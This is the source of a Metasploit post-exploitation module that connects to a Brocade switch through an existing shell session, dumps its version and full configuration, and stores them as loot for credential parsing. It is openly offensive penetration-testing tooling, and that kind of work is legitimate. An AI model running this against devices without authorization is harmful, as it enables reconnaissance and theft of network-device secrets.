1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Auxiliary::Brocade
8
  include Msf::Exploit::Deprecated
9
  moved_from 'post/brocade/gather/enum_brocade'
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'Brocade Gather Device General Information',
16
        'Description' => %q{
17
          This module collects Brocade device information and configuration.
18
          This module has been tested against an icx6430 running 08.0.20T311.
19
        },
20
        'License' => MSF_LICENSE,
21
        'Author' => [ 'h00die'],
22
        'Platform' => [ 'brocade'],
23
        'SessionTypes' => [ 'shell' ],
24
        'Notes' => {
25
          'Stability' => [CRASH_SAFE],
26
          'SideEffects' => [IOC_IN_LOGS],
27
          'Reliability' => []
28
        }
29
      )
30
    )
31
  end
32

33
  def run
34
    # Get device prompt
35
    prompt = session.shell_command("\n")
36

37
    if prompt.end_with?('(config)#') # config shell
38
      vprint_status('In a config cli')
39
      session.shell_write("skip-page-display\n")
40
      session.shell_write("terminal length 0\n")
41
    elsif prompt.end_with?('#') # regular cli shell (non-config)
42
      vprint_status('In an enabled cli')
43
      session.shell_write("skip-page-display\n")
44
      session.shell_write("terminal length 0\n")
45
    elsif prompt.end_with?('>') # cli not enabled
46
      vprint_status('In a non-enabled cli')
47
    end
48

49
    # attempt to disable paging, cli not enabled this will fail anyways
50
    session.shell_write("skip-page-display\n")
51
    session.shell_write("terminal length 0\n")
52

53
    # Get version info
54
    print_status('Getting version information')
55
    version_out = session.shell_command("show version\n")
56
    if /^, Version: (?<ver>.+) | SW: Version (?<ver>.+) /i =~ version_out
57
      vprint_status("OS: #{ver}")
58
    end
59

60
    ver_loc = store_loot('brocade.version',
61
                         'text/plain',
62
                         session,
63
                         version_out.strip,
64
                         'version.txt',
65
                         'Brocade Version')
66

67
    # Print the version of VERBOSE set to true.
68
    vprint_good("Version information stored in to loot #{ver_loc}")
69

70
    # run additional information gathering
71
    enum_configs(prompt)
72
  end
73

74
  # run commands found in exec mode under privilege 1
75
  def enum_configs(prompt)
76
    host = session.session_host
77
    port = session.session_port
78
    exec_commands = [
79
      {
80
        'cmd' => 'show configuration',
81
        'fn' => 'get_config',
82
        'desc' => 'Get Device Config on Brocade Device'
83
      },
84
    ]
85
    exec_commands.each do |ec|
86
      command = ec['cmd']
87
      cmd_out = session.shell_command(command).gsub(/#{command}|#{prompt}/, '')
88
      print_status("Gathering info from #{command}")
89
      # detect if we're in pagination and get as much data as possible
90
      if cmd_out.include?('--More--')
91
        cmd_out += session.shell_command(" \n" * 20) # 20 pages *should* be enough
92
      end
93
      if ec['fn'] == 'get_config'
94
        brocade_config_eater(host, port, cmd_out.strip)
95
      else
96
        cmd_loc = store_loot("brocade.#{ec['fn']}",
97
                             'text/plain',
98
                             session,
99
                             cmd_out.strip,
100
                             "#{ec['fn']}.txt",
101
                             ec['desc'])
102
        vprint_good("Saving to #{cmd_loc}")
103
      end
104
    end
105
  end
106
end
107

108